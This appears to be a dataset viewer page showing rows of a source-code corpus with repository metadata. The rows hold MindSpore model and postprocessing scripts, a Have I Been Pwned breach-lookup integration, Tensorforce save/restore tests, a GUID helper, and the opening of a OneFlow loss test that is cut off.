Dataset Viewer
hexsha
stringlengths 40
40
| size
int64 6
782k
| ext
stringclasses 7
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
237
| max_stars_repo_name
stringlengths 6
72
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
sequence | max_stars_count
int64 1
53k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
184
| max_issues_repo_name
stringlengths 6
72
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
sequence | max_issues_count
int64 1
27.1k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
184
| max_forks_repo_name
stringlengths 6
72
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
sequence | max_forks_count
int64 1
12.2k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 6
782k
| avg_line_length
float64 2.75
664k
| max_line_length
int64 5
782k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8a78745915eb3a4aaf90865a024b4d8bafd46ca7 | 5,151 | py | Python | research/gnn/sgcn/postprocess.py | leelige/mindspore | 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | [
"Apache-2.0"
] | 1 | 2021-11-18T08:17:44.000Z | 2021-11-18T08:17:44.000Z | research/gnn/sgcn/postprocess.py | leelige/mindspore | 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | [
"Apache-2.0"
] | null | null | null | research/gnn/sgcn/postprocess.py | leelige/mindspore | 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | [
"Apache-2.0"
] | 2 | 2019-09-01T06:17:04.000Z | 2019-10-04T08:39:45.000Z | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
postprocess.
"""
import os
import argparse
import numpy as np
from src.ms_utils import calculate_auc
from mindspore import context, load_checkpoint
def softmax(x):
t_max = np.max(x, axis=1, keepdims=True) # returns max of each row and keeps same dims
e_x = np.exp(x - t_max) # subtracts each row with its max value
t_sum = np.sum(e_x, axis=1, keepdims=True) # returns sum of each row and keeps same dims
f_x = e_x / t_sum
return f_x
def score_model(preds, test_pos, test_neg, weight, bias):
"""
Score the model on the test set edges in each epoch.
Args:
epoch (LongTensor): Training epochs.
Returns:
auc(Float32): AUC result.
f1(Float32): F1-Score result.
"""
score_positive_edges = np.array(test_pos, dtype=np.int32).T
score_negative_edges = np.array(test_neg, dtype=np.int32).T
test_positive_z = np.concatenate((preds[score_positive_edges[0, :], :],
preds[score_positive_edges[1, :], :]), axis=1)
test_negative_z = np.concatenate((preds[score_negative_edges[0, :], :],
preds[score_negative_edges[1, :], :]), axis=1)
# operands could not be broadcast together with shapes (4288,128) (128,3)
scores = np.dot(np.concatenate((test_positive_z, test_negative_z), axis=0), weight) + bias
probability_scores = np.exp(softmax(scores))
predictions = probability_scores[:, 0]/probability_scores[:, 0:2].sum(1)
# predictions = predictions.asnumpy()
targets = [0]*len(test_pos) + [1]*len(test_neg)
auc, f1 = calculate_auc(targets, predictions)
return auc, f1
def get_acc():
"""get infer Accuracy."""
parser = argparse.ArgumentParser(description='postprocess')
parser.add_argument('--dataset_name', type=str, default='bitcoin-otc', choices=['bitcoin-otc', 'bitcoin-alpha'],
help='dataset name')
parser.add_argument('--result_path', type=str, default='./ascend310_infer/input/', help='result Files')
parser.add_argument('--label_path', type=str, default='', help='y_test npy Files')
parser.add_argument('--mask_path', type=str, default='', help='test_mask npy Files')
parser.add_argument("--checkpoint_file", type=str, default='sgcn_alpha_f1.ckpt', help="Checkpoint file path.")
parser.add_argument("--edge_path", nargs="?",
default="./input/bitcoin_alpha.csv", help="Edge list csv.")
parser.add_argument("--features-path", nargs="?",
default="./input/bitcoin_alpha.csv", help="Edge list csv.")
parser.add_argument("--test-size", type=float,
default=0.2, help="Test dataset size. Default is 0.2.")
parser.add_argument("--seed", type=int, default=42,
help="Random seed for sklearn pre-training. Default is 42.")
parser.add_argument("--spectral-features", default=True, dest="spectral_features", action="store_true")
parser.add_argument("--reduction-iterations", type=int,
default=30, help="Number of SVD iterations. Default is 30.")
parser.add_argument("--reduction-dimensions", type=int,
default=64, help="Number of SVD feature extraction dimensions. Default is 64.")
args_opt = parser.parse_args()
# Runtime
context.set_context(mode=context.GRAPH_MODE, device_target='Ascend', device_id=0)
# Create network
test_pos = np.load(os.path.join(args_opt.result_path, 'pos_test.npy'))
test_neg = np.load(os.path.join(args_opt.result_path, 'neg_test.npy'))
# Load parameters from checkpoint into network
param_dict = load_checkpoint(args_opt.checkpoint_file)
print(type(param_dict))
print(param_dict)
print(type(param_dict['regression_weights']))
print(param_dict['regression_weights'])
# load_param_into_net(net, param_dict)
pred = np.fromfile('./result_Files/repos_0.bin', np.float32)
if args_opt.dataset_name == 'bitcoin-otc':
pred = pred.reshape(5881, 64)
else:
pred = pred.reshape(3783, 64)
auc, f1 = score_model(pred, test_pos, test_neg, param_dict['regression_weights'].asnumpy(),
param_dict['regression_bias'].asnumpy())
print("Test set results:", "auc=", "{:.5f}".format(auc), "f1=", "{:.5f}".format(f1))
if __name__ == '__main__':
get_acc()
| 48.140187 | 117 | 0.644729 |
0a10152195fb9a20741a86fb44035860fed300f4 | 12,017 | py | Python | Packs/Pwned/Integrations/PwnedV2/PwnedV2.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 799 | 2016-08-02T06:43:14.000Z | 2022-03-31T11:10:11.000Z | Packs/Pwned/Integrations/PwnedV2/PwnedV2.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 9,317 | 2016-08-07T19:00:51.000Z | 2022-03-31T21:56:04.000Z | Packs/Pwned/Integrations/PwnedV2/PwnedV2.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 1,297 | 2016-08-04T13:59:00.000Z | 2022-03-31T23:43:06.000Z | from CommonServerPython import *
''' IMPORTS '''
import re
import requests
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBALS/PARAMS '''
VENDOR = 'Have I Been Pwned? V2'
MAX_RETRY_ALLOWED = demisto.params().get('max_retry_time', -1)
API_KEY = demisto.params().get('api_key')
USE_SSL = not demisto.params().get('insecure', False)
BASE_URL = 'https://haveibeenpwned.com/api/v3'
HEADERS = {
'hibp-api-key': API_KEY,
'user-agent': 'DBOT-API',
'Content-Type': 'application/json',
'Accept': 'application/json'
}
DEFAULT_DBOT_SCORE_EMAIL = 2 if demisto.params().get('default_dbot_score_email') == 'SUSPICIOUS' else 3
DEFAULT_DBOT_SCORE_DOMAIN = 2 if demisto.params().get('default_dbot_score_domain') == 'SUSPICIOUS' else 3
SUFFIXES = {
"email": '/breachedaccount/',
"domain": '/breaches?domain=',
"username": '/breachedaccount/',
"paste": '/pasteaccount/',
"email_truncate_verified": '?truncateResponse=false&includeUnverified=true',
"domain_truncate_verified": '&truncateResponse=false&includeUnverified=true',
"username_truncate_verified": '?truncateResponse=false&includeUnverified=true'
}
RETRIES_END_TIME = datetime.min
''' HELPER FUNCTIONS '''
def http_request(method, url_suffix, params=None, data=None):
while True:
res = requests.request(
method,
BASE_URL + url_suffix,
verify=USE_SSL,
params=params,
data=data,
headers=HEADERS
)
if res.status_code != 429:
# Rate limit response code
break
if datetime.now() > RETRIES_END_TIME:
return_error('Max retry time has exceeded.')
wait_regex = re.search(r'\d+', res.json()['message'])
if wait_regex:
wait_amount = wait_regex.group()
else:
demisto.error('failed extracting wait time will use default (5). Res body: {}'.format(res.text))
wait_amount = 5
if datetime.now() + timedelta(seconds=int(wait_amount)) > RETRIES_END_TIME:
return_error('Max retry time has exceeded.')
time.sleep(int(wait_amount))
if res.status_code == 404:
return None
if not res.status_code == 200:
if not res.status_code == 401:
demisto.error(
'Error in API call to Pwned Integration [%d]. Full text: %s' % (res.status_code, res.text))
return_error('Error in API call to Pwned Integration [%d] - %s' % (res.status_code, res.reason))
return None
return res.json()
def html_description_to_human_readable(breach_description):
"""
Converting from html description to hr
:param breach_description: Description of breach from API response
:return: Description string that altered HTML urls to clickable urls
for better readability in war-room
"""
html_link_pattern = re.compile('<a href="(.+?)"(.+?)>(.+?)</a>')
patterns_found = html_link_pattern.findall(breach_description)
for link in patterns_found:
html_actual_address = link[0]
html_readable_name = link[2]
link_from_desc = '[' + html_readable_name + ']' + '(' + html_actual_address + ')'
breach_description = re.sub(html_link_pattern, link_from_desc, breach_description, count=1)
return breach_description
def data_to_markdown(query_type, query_arg, api_res, api_paste_res=None):
records_found = False
md = '### Have I Been Pwned query for ' + query_type.lower() + ': *' + query_arg + '*\n'
if api_res:
records_found = True
for breach in api_res:
verified_breach = 'Verified' if breach['IsVerified'] else 'Unverified'
md += '#### ' + breach['Title'] + ' (' + breach['Domain'] + '): ' + str(breach['PwnCount']) + \
' records breached [' + verified_breach + ' breach]\n'
md += 'Date: **' + breach['BreachDate'] + '**\n\n'
md += html_description_to_human_readable(breach['Description']) + '\n'
md += 'Data breached: **' + ','.join(breach['DataClasses']) + '**\n'
if api_paste_res:
records_found = True
pastes_list = []
for paste_breach in api_paste_res:
paste_entry = \
{
'Source': paste_breach['Source'],
'Title': paste_breach['Title'],
'ID': paste_breach['Id'],
'Date': '',
'Amount of emails in paste': str(paste_breach['EmailCount'])
}
if paste_breach['Date']:
paste_entry['Date'] = paste_breach['Date'].split('T')[0]
pastes_list.append(paste_entry)
md += tableToMarkdown('The email address was found in the following "Pastes":',
pastes_list,
['ID', 'Title', 'Date', 'Source', 'Amount of emails in paste'])
if not records_found:
md += 'No records found'
return md
def create_dbot_score_dictionary(indicator_value, indicator_type, dbot_score):
return {
'Indicator': indicator_value,
'Type': indicator_type,
'Vendor': VENDOR,
'Score': dbot_score
}
def create_context_entry(context_type, context_main_value, comp_sites, comp_pastes, malicious_score):
context_dict = dict() # dict
if context_type == 'email':
context_dict['Address'] = context_main_value
else:
context_dict['Name'] = context_main_value
context_dict['Pwned-V2'] = {
'Compromised': {
'Vendor': VENDOR,
'Reporters': ', '.join(comp_sites + comp_pastes)
}
}
if malicious_score == 3:
context_dict['Malicious'] = add_malicious_to_context(context_type)
return context_dict
def add_malicious_to_context(malicious_type):
return {
'Vendor': VENDOR,
'Description': 'The ' + malicious_type + ' has been compromised'
}
def email_to_entry_context(email, api_email_res, api_paste_res):
dbot_score = 0
comp_email = dict() # type: dict
comp_sites = sorted([item['Title'] for item in api_email_res])
comp_pastes = sorted(set(item['Source'] for item in api_paste_res))
if len(comp_sites) > 0:
dbot_score = DEFAULT_DBOT_SCORE_EMAIL
email_context = create_context_entry('email', email, comp_sites, comp_pastes, DEFAULT_DBOT_SCORE_EMAIL)
comp_email[outputPaths['email']] = email_context
comp_email['DBotScore'] = create_dbot_score_dictionary(email, 'email', dbot_score)
return comp_email
def domain_to_entry_context(domain, api_res):
comp_sites = [item['Title'] for item in api_res]
comp_sites = sorted(comp_sites)
comp_domain = dict() # type: dict
dbot_score = 0
if len(comp_sites) > 0:
dbot_score = DEFAULT_DBOT_SCORE_DOMAIN
domain_context = create_context_entry('domain', domain, comp_sites, [], DEFAULT_DBOT_SCORE_DOMAIN)
comp_domain[outputPaths['domain']] = domain_context
comp_domain['DBotScore'] = create_dbot_score_dictionary(domain, 'domain', dbot_score)
return comp_domain
def set_retry_end_time():
global RETRIES_END_TIME
if MAX_RETRY_ALLOWED != -1:
RETRIES_END_TIME = datetime.now() + timedelta(seconds=int(MAX_RETRY_ALLOWED))
''' COMMANDS + REQUESTS FUNCTIONS '''
def test_module(args_dict):
"""
If the http request was successful the test will return OK
:return: 3 arrays of outputs
"""
http_request('GET', SUFFIXES.get("username", '') + 'test')
return ['ok'], [None], [None]
def pwned_email_command(args_dict):
"""
Executing the pwned request for emails list, in order to support list input, the function returns 3 lists of outputs
:param args_dict: the demisto argument - in this case the email list is needed
:return: 3 arrays of outputs
"""
email_list = argToList(args_dict.get('email', ''))
api_email_res_list, api_paste_res_list = pwned_email(email_list)
md_list = []
ec_list = []
for email, api_email_res, api_paste_res in zip(email_list, api_email_res_list, api_paste_res_list):
md_list.append(data_to_markdown('Email', email, api_email_res, api_paste_res))
ec_list.append(email_to_entry_context(email, api_email_res or [], api_paste_res or []))
return md_list, ec_list, api_email_res_list
def pwned_email(email_list):
"""
Executing the http requests
:param email_list: the email list that needed for the http requests
:return: 2 arrays of http requests outputs
"""
api_email_res_list = []
api_paste_res_list = []
for email in email_list:
email_suffix = SUFFIXES.get("email") + email + SUFFIXES.get("email_truncate_verified")
paste_suffix = SUFFIXES.get("paste") + email
api_email_res_list.append(http_request('GET', url_suffix=email_suffix))
api_paste_res_list.append(http_request('GET', url_suffix=paste_suffix))
return api_email_res_list, api_paste_res_list
def pwned_domain_command(args_dict):
"""
Executing the pwned request for domains list, in order to support list input, the function returns 3 lists of
outputs
:param args_dict: the demisto argument - in this case the domain list is needed
:return: 3 arrays of outputs
"""
domain_list = argToList(args_dict.get('domain', ''))
api_res_list = pwned_domain(domain_list)
md_list = []
ec_list = []
for domain, api_res in zip(domain_list, api_res_list):
md_list.append(data_to_markdown('Domain', domain, api_res))
ec_list.append(domain_to_entry_context(domain, api_res or []))
return md_list, ec_list, api_res_list
def pwned_domain(domain_list):
"""
Executing the http request
:param domain_list: the domains list that needed for the http requests
:return: an array of http requests outputs
"""
api_res_list = []
for domain in domain_list:
suffix = SUFFIXES.get("domain") + domain + SUFFIXES.get("domain_truncate_verified")
api_res_list.append(http_request('GET', url_suffix=suffix))
return api_res_list
def pwned_username_command(args_dict):
"""
Executing the pwned request for usernames list, in order to support list input, the function returns 3 lists of
outputs
:param args_dict: the demisto argument - in this case the username list is needed
:return: 3 arrays of outputs
"""
username_list = argToList(args_dict.get('username', ''))
api_res_list = pwned_username(username_list)
md_list = []
ec_list = []
for username, api_res in zip(username_list, api_res_list):
md_list.append(data_to_markdown('Username', username, api_res))
ec_list.append(domain_to_entry_context(username, api_res or []))
return md_list, ec_list, api_res_list
def pwned_username(username_list):
"""
Executing the http request
:param username_list: the username list that needed for the http requests
:return: an array of http requests outputs
"""
api_res_list = []
for username in username_list:
suffix = SUFFIXES.get("username") + username + SUFFIXES.get("username_truncate_verified")
api_res_list.append(http_request('GET', url_suffix=suffix))
return api_res_list
command = demisto.command()
LOG('Command being called is: {}'.format(command))
try:
handle_proxy()
set_retry_end_time()
commands = {
'test-module': test_module,
'email': pwned_email_command,
'pwned-email': pwned_email_command,
'domain': pwned_domain_command,
'pwned-domain': pwned_domain_command,
'pwned-username': pwned_username_command
}
if command in commands:
md_list, ec_list, api_email_res_list = commands[command](demisto.args())
for md, ec, api_paste_res in zip(md_list, ec_list, api_email_res_list):
return_outputs(md, ec, api_paste_res)
# Log exceptions
except Exception as e:
return_error(str(e))
| 34.042493 | 120 | 0.659732 |
0a8fdb2b5cc10e441111eda628478417245011ef | 5,283 | py | Python | official/cv/c3d/src/c3d_model.py | leelige/mindspore | 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | [
"Apache-2.0"
] | 77 | 2021-10-15T08:32:37.000Z | 2022-03-30T13:09:11.000Z | official/cv/c3d/src/c3d_model.py | leelige/mindspore | 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | [
"Apache-2.0"
] | 3 | 2021-10-30T14:44:57.000Z | 2022-02-14T06:57:57.000Z | official/cv/c3d/src/c3d_model.py | leelige/mindspore | 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | [
"Apache-2.0"
] | 24 | 2021-10-15T08:32:45.000Z | 2022-03-24T18:45:20.000Z | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import math
import mindspore.nn as nn
import mindspore.ops as P
from mindspore.common import initializer as init
from src.utils import default_recurisive_init, KaimingNormal
class C3D(nn.Cell):
"""
C3D network definition.
Args:
num_classes (int): Class numbers. Default: 1000.
Returns:
Tensor, infer output tensor.
Examples:
>>> C3D(num_classes=1000)
"""
def __init__(self, num_classes=1000):
super(C3D, self).__init__()
self.conv1 = nn.Conv3d(in_channels=3, out_channels=64, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool1 = P.MaxPool3D(kernel_size=(1, 2, 2), strides=(1, 2, 2), pad_mode='same')
self.conv2 = nn.Conv3d(in_channels=64, out_channels=128, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool2 = P.MaxPool3D(kernel_size=(2, 2, 2), strides=(2, 2, 2), pad_mode='same')
self.conv3a = nn.Conv3d(in_channels=128, out_channels=256, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.conv3b = nn.Conv3d(in_channels=256, out_channels=256, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool3 = P.MaxPool3D(kernel_size=(2, 2, 2), strides=(2, 2, 2), pad_mode='same')
self.conv4a = nn.Conv3d(in_channels=256, out_channels=512, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.conv4b = nn.Conv3d(in_channels=512, out_channels=512, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool4 = P.MaxPool3D(kernel_size=(2, 2, 2), strides=(2, 2, 2), pad_mode='same')
self.conv5a = nn.Conv3d(in_channels=512, out_channels=512, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.conv5b = nn.Conv3d(in_channels=512, out_channels=512, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool5 = P.MaxPool3D(kernel_size=(2, 2, 2), strides=(2, 2, 2), pad_mode='same')
self.fc6 = nn.Dense(in_channels=8192, out_channels=4096)
self.fc7 = nn.Dense(in_channels=4096, out_channels=4096)
self.fc8 = nn.Dense(in_channels=4096, out_channels=num_classes, bias_init=init.Normal(0.02))
self.dropout = nn.Dropout(keep_prob=0.5)
self.relu = nn.ReLU()
self.pad = nn.Pad(paddings=((0, 0), (0, 0), (1, 0), (1, 0)), mode="CONSTANT")
self.__init_weight()
def __init_weight(self):
default_recurisive_init(self)
self.custom_init_weight()
def construct(self, x):
x = self.relu(self.conv1(x))
x = self.pool1(x)
x = self.relu(self.conv2(x))
x = self.pool2(x)
x = self.relu(self.conv3a(x))
x = self.relu(self.conv3b(x))
x = self.pool3(x)
x = self.relu(self.conv4a(x))
x = self.relu(self.conv4b(x))
x = self.pool4(x)
x = self.relu(self.conv5a(x))
x = self.relu(self.conv5b(x))
x = x.view(-1, 512 * 2, 7, 7)
x = self.pad(x)
x = x.view(-1, 512, 2, 8, 8)
x = self.pool5(x)
x = x.view(-1, 8192)
x = self.relu(self.fc6(x))
x = self.dropout(x)
x = self.relu(self.fc7(x))
x = self.dropout(x)
logits = self.fc8(x)
return logits
def custom_init_weight(self):
"""
Init the weight of Conv3d and Dense in the net.
"""
for _, cell in self.cells_and_names():
if isinstance(cell, nn.Conv3d):
cell.weight.set_data(init.initializer(
KaimingNormal(a=math.sqrt(5), mode='fan_out', nonlinearity='relu'),
cell.weight.shape, cell.weight.dtype))
if cell.bias is not None:
cell.bias.set_data(init.initializer(
'zeros', cell.bias.shape, cell.bias.dtype))
elif isinstance(cell, nn.Dense):
cell.weight.set_data(init.initializer(
init.Normal(0.01), cell.weight.shape, cell.weight.dtype))
if cell.bias is not None:
cell.bias.set_data(init.initializer(
'zeros', cell.bias.shape, cell.bias.dtype))
| 40.638462 | 100 | 0.570509 |
7c2f595fee4e21dc84c6666b03b2174e6d5731e0 | 8,108 | py | Python | tensorforce/tests/test_model_save_restore.py | gian1312/suchen | df863140fd8df1ac2e195cbdfa4756f09f962270 | [
"Apache-2.0"
] | null | null | null | tensorforce/tests/test_model_save_restore.py | gian1312/suchen | df863140fd8df1ac2e195cbdfa4756f09f962270 | [
"Apache-2.0"
] | null | null | null | tensorforce/tests/test_model_save_restore.py | gian1312/suchen | df863140fd8df1ac2e195cbdfa4756f09f962270 | [
"Apache-2.0"
] | 1 | 2019-11-29T12:28:33.000Z | 2019-11-29T12:28:33.000Z | from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import unittest
import pytest
from tensorforce import TensorForceError
from tensorforce.core.networks import LayeredNetwork
from tensorforce.models import DistributionModel
from tensorforce.tests.minimal_test import MinimalTest
from tensorforce.agents import PPOAgent
from tensorforce.execution import Runner
import tensorflow as tf
import numpy as np
from tensorforce.util import SavableComponent
import os
class SavableNetwork(LayeredNetwork, SavableComponent):
"""
Minimal implementation of a Network that can be saved and restored independently of the Model.
"""
def get_savable_variables(self):
return super(SavableNetwork, self).get_variables(include_nontrainable=False)
def _get_base_variable_scope(self):
return self.apply.variable_scope_name
def create_environment(spec):
return MinimalTest(spec)
def create_agent(environment, network_spec):
return PPOAgent(
update_mode=dict(
unit='episodes',
batch_size=4,
frequency=4
),
memory=dict(
type='latest',
include_next_states=False,
capacity=100
),
step_optimizer=dict(
type='adam',
learning_rate=1e-3
),
subsampling_fraction=0.3,
optimization_steps=20,
states=environment.states,
actions=environment.actions,
network=network_spec
)
class TestModelSaveRestore(unittest.TestCase):
@pytest.fixture(autouse=True)
def initdir(self, tmpdir):
tmpdir.chdir()
self._tmp_dir_path = str(tmpdir)
print("Using %s" % (self._tmp_dir_path, ))
def test_save_restore(self):
environment_spec = {"float": ()}
environment = create_environment(environment_spec)
network_spec = [
dict(type='dense', size=32)
]
agent = create_agent(environment, network_spec)
runner = Runner(agent=agent, environment=environment)
runner.run(episodes=100)
model_values = agent.model.session.run(agent.model.get_variables(
include_submodules=True,
include_nontrainable=False
))
save_path = agent.model.save(directory=self._tmp_dir_path + "/model")
print("Saved at: %s" % (save_path,))
runner.close()
agent = create_agent(environment, network_spec)
agent.model.restore(directory="", file=save_path)
restored_model_values = agent.model.session.run(agent.model.get_variables(
include_submodules=True,
include_nontrainable=False
))
assert len(model_values) == len(restored_model_values)
assert all([np.array_equal(v1, v2) for v1, v2 in zip(model_values, restored_model_values)])
agent.close()
def test_save_network(self):
"""
Test to validate that calls to save and restore of a SavableComponent successfully save and restore the
component's state.
"""
environment_spec = {"float": ()}
environment = create_environment(environment_spec)
network_spec = dict(
type=SavableNetwork,
layers=[dict(type='dense', size=1)]
)
agent = create_agent(environment, network_spec)
assert isinstance(agent.model.network, SavableComponent)
runner = Runner(agent=agent, environment=environment)
runner.run(episodes=100)
network_values = agent.model.session.run(agent.model.network.get_variables())
distribution = next(iter(agent.model.distributions.values()))
distribution_values = agent.model.session.run(distribution.get_variables())
save_path = self._tmp_dir_path + "/network"
agent.model.save_component(component_name=DistributionModel.COMPONENT_NETWORK, save_path=save_path)
runner.close()
assert os.path.isfile(save_path + ".data-00000-of-00001")
assert os.path.isfile(save_path + ".index")
agent = create_agent(environment, network_spec)
agent.model.restore_component(component_name=DistributionModel.COMPONENT_NETWORK, save_path=save_path)
# Ensure only the network variables are loaded
restored_network_values = agent.model.session.run(agent.model.network.get_variables(include_nontrainable=True))
distribution = next(iter(agent.model.distributions.values()))
restored_distribution_values = agent.model.session.run(distribution.get_variables())
assert len(restored_network_values) == len(network_values)
assert all([np.array_equal(v1, v2) for v1, v2 in zip(network_values, restored_network_values)])
assert len(restored_distribution_values) == len(distribution_values)
assert not all([np.array_equal(v1, v2) for v1, v2 in zip(distribution_values, restored_distribution_values)])
agent.close()
environment.close()
def test_pretrain_network(self):
"""
Simulates training outside of Tensorforce and then loading the parameters in the agent's network.
"""
environment_spec = {"float": ()}
environment = create_environment(environment_spec)
size = environment.states["shape"]
output_size = 1
save_path = self._tmp_dir_path + "/network"
g = tf.Graph()
with g.as_default():
x = tf.placeholder(dtype=environment.states["type"], shape=[None, size])
layer = tf.layers.Dense(units=output_size)
y = layer(x)
y_ = tf.placeholder(dtype=environment.states["type"], shape=[None, output_size])
loss = tf.losses.mean_squared_error(y_, y)
optimizer = tf.train.AdamOptimizer(learning_rate=0.1)
train_step = optimizer.minimize(loss)
batch_size = 64
with tf.Session(graph=g) as sess:
sess.run(tf.global_variables_initializer())
for epoch in range(100):
batch = np.random.random([batch_size, size])
correct = np.ones(shape=[batch.shape[0], output_size])
loss_value, _ = sess.run([loss, train_step], {x: batch, y_: correct})
if epoch % 10 == 0:
print("epoch %d: %f" % (epoch, loss_value))
var_map = {
"dense0/apply/linear/apply/W:0": layer.kernel,
"dense0/apply/linear/apply/b:0": layer.bias
}
saver = tf.train.Saver(var_list=var_map)
saver.save(sess=sess, write_meta_graph=False, save_path=save_path)
network_spec = dict(
type=SavableNetwork,
layers=[dict(type='dense', size=output_size)],
)
agent = create_agent(environment, network_spec)
agent.model.restore_component(component_name=agent.model.COMPONENT_NETWORK, save_path=save_path)
agent.close()
def test_non_savable_component(self):
environment_spec = {"float": ()}
environment = create_environment(environment_spec)
network_spec = [dict(type='dense', size=32)]
agent = create_agent(environment, network_spec)
expected_message = "Component network must implement SavableComponent but is "
with pytest.raises(TensorForceError) as excinfo:
agent.model.restore_component(component_name="network", save_path=self._tmp_dir_path + "/network")
assert expected_message in str(excinfo.value)
with pytest.raises(TensorForceError) as excinfo:
agent.model.save_component(component_name="network", save_path=self._tmp_dir_path + "/network")
assert expected_message in str(excinfo.value)
with pytest.raises(TensorForceError) as excinfo:
agent.model.restore_component(component_name="non-existent", save_path=self._tmp_dir_path + "/network")
assert "Component non-existent must implement SavableComponent but is None" == str(excinfo.value)
agent.close()
| 39.940887 | 119 | 0.662309 |
7c2f74f5570ad8ece2d2a501cd63b62951484c2c | 844 | py | Python | guid.py | lihuiba/SoftSAN | 1b8ab2cae92b7aac34211909b27d4ebe595275d7 | [
"Apache-2.0"
] | 1 | 2015-08-02T09:53:18.000Z | 2015-08-02T09:53:18.000Z | guid.py | lihuiba/SoftSAN | 1b8ab2cae92b7aac34211909b27d4ebe595275d7 | [
"Apache-2.0"
] | null | null | null | guid.py | lihuiba/SoftSAN | 1b8ab2cae92b7aac34211909b27d4ebe595275d7 | [
"Apache-2.0"
] | 2 | 2018-03-21T04:59:50.000Z | 2019-12-03T15:54:17.000Z | import random
import messages_pb2 as msg
def assign(x, y):
x.a=y.a; x.b=y.b; x.c=y.c; x.d=y.d
def isZero(x):
return (x.a==0 and x.b==0 and x.c==0 and x.d==0)
def setZero(x):
x.a=0; x.b=0; x.c=0; x.d=0
def toStr(x):
return "%08x-%08x-%08x-%08x" % (x.a, x.b, x.c, x.d)
def toTuple(x):
return (x.a, x.b, x.c, x.d)
def fromTuple(x):
ret=msg.Guid()
ret.a=x[0]
ret.b=x[1]
ret.c=x[2]
ret.d=x[3]
return ret
def generate(guid=None):
ret=guid or msg.Guid()
ret.a=random.randint(0, 0xffffffff)
ret.b=random.randint(0, 0xffffffff)
ret.c=random.randint(0, 0xffffffff)
ret.d=random.randint(0, 0xffffffff)
return ret
def fromStr(s):
ret=msg.Guid()
s=s.split('-')
ret.a=int(s[0], 16)
ret.b=int(s[1], 16)
ret.c=int(s[2], 16)
ret.d=int(s[3], 16)
return ret
| 19.181818 | 55 | 0.562796 |
861c79331c252b7937573a42f8e033c57c978cd9 | 6,138 | py | Python | oneflow/python/test/ops/test_l1loss.py | wanghongsheng01/framework_enflame | debf613e05e3f5ea8084c3e79b60d0dd9e349526 | [
"Apache-2.0"
] | 2 | 2021-09-10T00:19:49.000Z | 2021-11-16T11:27:20.000Z | oneflow/python/test/ops/test_l1loss.py | duijiudanggecl/oneflow | d2096ae14cf847509394a3b717021e2bd1d72f62 | [
"Apache-2.0"
] | 1 | 2021-06-16T08:37:50.000Z | 2021-06-16T08:37:50.000Z | oneflow/python/test/ops/test_l1loss.py | duijiudanggecl/oneflow | d2096ae14cf847509394a3b717021e2bd1d72f62 | [
"Apache-2.0"
] | 1 | 2021-11-10T07:57:01.000Z | 2021-11-10T07:57:01.000Z | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import oneflow as flow
import numpy as np
import oneflow.typing as tp
from test_util import GenArgList
import unittest
from collections import OrderedDict
from typing import Dict
import os
def _compare_l1loss_with_np(
